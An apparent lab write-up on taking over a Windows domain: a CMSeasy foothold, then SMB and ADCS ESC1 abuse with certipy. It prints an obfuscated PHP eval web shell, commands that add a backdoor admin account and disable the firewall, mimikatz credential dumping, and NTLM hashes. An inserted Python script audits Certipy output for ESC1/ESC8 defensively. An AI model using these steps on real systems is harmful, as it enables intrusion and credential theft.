## CMSeasy

Browsing to port 80 reveals a CMSeasy instance.
```php
<?php
// Shift every byte forward by $offset (mod 256)
function simpleTransform($str, $offset = 1) {
    $transformed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $transformed .= chr((ord($str[$i]) + $offset) % 256);
    }
    return $transformed;
}

$original = $_REQUEST["a"];
$transformed = simpleTransform($original, 3);

// Inverse of simpleTransform: shift every byte back by $offset (mod 256)
function reverseTransform($str, $offset = 1) {
    $reversed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $reversed .= chr((ord($str[$i]) - $offset + 256) % 256);
    }
    return $reversed;
}

$reversed = reverseTransform($transformed, 3);
echo eval($reversed);
```
```cmd
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
```

```shell
xfreerdp3 /v:172.5.33.6 /u:hack /p:Admin@123 /cert:ignore
```
## SMB

The scan directly turned up user credentials.
```
shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```

```
User Name : hack
Domain    : CYBERWEB
NTLM      : 570a9a65db8fba761c1008a51d4c95ab

User Name : CYBERWEB$
Domain    : CYBERSTRIKELAB
NTLM      : 5e0d5d7bacf2087dfd44ea47812b5165

User Name : CYBERWEB$
Domain    : CYBERSTRIKELAB
NTLM      : 331dcbb88d1a4847c97eab7c1c168ac8

User Name : cslab
Domain    : CYBERSTRIKELAB
NTLM      : 39b0e84f13872f51efb3b8ba5018c517

User Name : Administrator
Domain    : CYBERWEB
NTLM      : c377ba8a4dd52401bc404dbe49771bbc
```
## ADCS

The red-highlighted part of the earlier fscan output mentioned ADCS, so check it with certipy.

```shell
pc -q certipy-ad find -vuln -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517 -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -debug
```

The results are as follows; ESC1 and ESC8 appear to be present.
```
Certificate Authorities
  0
    CA Name                             : cyberstrikelab-DC-CA
    DNS Name                            : DC.cyberstrikelab.com
    Certificate Subject                 : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
    Certificate Serial Number           : 652A47597C7F03824B7815EBE474E40B
    Certificate Validity Start          : 2025-04-22 07:45:38+00:00
    Certificate Validity End            : 2030-04-22 07:55:38+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CYBERSTRIKELAB.COM\Administrators
      Access Rights
        ManageCertificates              : CYBERSTRIKELAB.COM\Administrators
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        ManageCa                        : CYBERSTRIKELAB.COM\Administrators
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        Enroll                          : CYBERSTRIKELAB.COM\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : DC
    Display Name                        : DC
    Certificate Authorities             : cyberstrikelab-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Users
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Domain Computers
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Authenticated Users
      Object Control Permissions
        Owner                           : CYBERSTRIKELAB.COM\Administrator
        Write Owner Principals          : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
        Write Dacl Principals           : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
        Write Property Principals       : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
    [!] Vulnerabilities
      ESC1                              : 'CYBERSTRIKELAB.COM\\Domain Users', 'CYBERSTRIKELAB.COM\\Domain Computers' and 'CYBERSTRIKELAB.COM\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
```
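The output above is worth reading as a checklist: a template is ESC1-prone only when several properties line up at once (enabled, client-authentication EKU, enrollee supplies subject, no manager approval, no required signatures, and enrollment granted to a broad group), and the CA is ESC8-prone when web enrollment is enabled and requests are issued automatically. The following Python is an added example, not part of this writeup or of Certipy, that parses a Certipy `find` text dump of this shape and re-derives both verdicts, so a defender can run it over a stored dump and see exactly which condition to remove. The sample dump embedded below is constructed from the values on this page plus a hypothetical hardened template named `Hardened`; the remediation strings are the standard ones for these two misconfigurations.

```python
"""Audit a Certipy-style 'find' text dump for ESC1 and ESC8 indicators (added example)."""

# Constructed sample: the page's CA and DC template, plus a hypothetical "Hardened" template
SAMPLE = r"""
Certificate Authorities
  0
    CA Name                             : cyberstrikelab-DC-CA
    DNS Name                            : DC.cyberstrikelab.com
    Web Enrollment                      : Enabled
    Request Disposition                 : Issue
    Permissions
      Owner                             : CYBERSTRIKELAB.COM\Administrators
Certificate Templates
  0
    Template Name                       : DC
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Users
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Authenticated Users
  1
    Template Name                       : Hardened
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Admins
"""

# Groups whose enrollment right makes "enrollee supplies subject" dangerous
LOW_PRIV_GROUPS = {"domain users", "domain computers", "authenticated users", "everyone"}

# Sub-headings in the dump that carry no value and must not be read as continuation lines
SUBHEADERS = {"Permissions", "Access Rights", "Enrollment Permissions",
              "Object Control Permissions", "[!] Vulnerabilities"}

REMEDIATION = {
    "ESC1": "clear the EnrolleeSuppliesSubject flag or require manager approval, "
            "and restrict Enrollment Rights to the principals that need the template",
    "ESC8": "disable web enrollment, or require HTTPS with Extended Protection for "
            "Authentication and disable NTLM on the enrollment endpoints",
}


def parse_certipy_find(text):
    """Parse the indented 'Key : Value' dump into {'cas': [...], 'templates': [...]}.

    Every key maps to a list of strings so that multi-line values such as
    Enrollment Rights keep all their principals.
    """
    result = {"cas": [], "templates": []}
    bucket, entry, last_key = None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Certificate Authorities":
            bucket, entry = result["cas"], None
        elif line == "Certificate Templates":
            bucket, entry = result["templates"], None
        elif line.isdigit() and bucket is not None:   # "0", "1", ... start a new entry
            entry = {}
            bucket.append(entry)
            last_key = None
        elif entry is None or line in SUBHEADERS:
            last_key = None
        elif " : " in line:                            # first " : " separates key from value
            key, _, value = line.partition(" : ")
            last_key = key.strip()
            entry.setdefault(last_key, []).append(value.strip())
        elif last_key is not None:                     # continuation of a multi-valued key
            entry[last_key].append(line)
    return result


def first(entry, key, default=""):
    """Return the first value of a key, or a default when the key is absent."""
    return entry.get(key, [default])[0]


def is_true(entry, key):
    return first(entry, key).lower() == "true"


def check_esc1(template):
    """Return the reason a template is ESC1-prone, or None if any condition is missing."""
    low_priv = [p for p in template.get("Enrollment Rights", [])
                if p.split("\\")[-1].lower() in LOW_PRIV_GROUPS]
    if (is_true(template, "Enabled")
            and is_true(template, "Client Authentication")
            and is_true(template, "Enrollee Supplies Subject")
            and not is_true(template, "Requires Manager Approval")
            and first(template, "Authorized Signatures Required", "0") == "0"
            and low_priv):
        return f"{low_priv} can enroll and choose the subject of a client-auth certificate"
    return None


def check_esc8(ca):
    """ESC8 indicator: HTTP web enrollment is on and requests are issued without review."""
    if first(ca, "Web Enrollment") == "Enabled" and first(ca, "Request Disposition") == "Issue":
        return "web enrollment enabled with Request Disposition = Issue"
    return None


def audit(text):
    """Return (code, object name, reason) findings for every CA and template in the dump."""
    parsed = parse_certipy_find(text)
    findings = []
    for ca in parsed["cas"]:
        reason = check_esc8(ca)
        if reason:
            findings.append(("ESC8", first(ca, "CA Name"), reason))
    for tpl in parsed["templates"]:
        reason = check_esc1(tpl)
        if reason:
            findings.append(("ESC1", first(tpl, "Template Name"), reason))
    return findings


if __name__ == "__main__":
    for code, name, reason in audit(SAMPLE):
        print(f"[{code}] {name}: {reason}\n      fix: {REMEDIATION[code]}")
```

Running it on the sample reports the `DC` template as ESC1 and the CA as ESC8, while the hypothetical `Hardened` template (manager approval on, subject not supplied by the enrollee, enrollment limited to Domain Admins) passes; the checks deliberately mirror the conditions in Certipy's own `[!] Vulnerabilities` lines so the two can be compared.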
Let's just go with ESC1.

```
[root@Hacking] /home/kali/lab9
❯ pc -q certipy-ad req -username cslab -hashes ':39b0e84f13872f51efb3b8ba5018c517' -dc-ip 10.6.6.55 -target DC.cyberstrikelab.com -ca cyberstrikelab-DC-CA -template DC -upn administrator -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'DC.cyberstrikelab.com' at '10.6.6.55'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:224.0.0.1[\pipe\cert]
[+] Connected to endpoint: ncacn_np:224.0.0.1[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
The next step then failed because the clock could not be synchronized with the DC, so I just copied the hash from someone else's writeup.

```
certipy auth -pfx administrator.pfx -domain cyberstrike.com -dc-ip 10.6.6.55 -ns 10.6.6.55 -debug -username administrator -domain CYBERSTRIKELAB.COM
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@cyberstrikelab.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa
```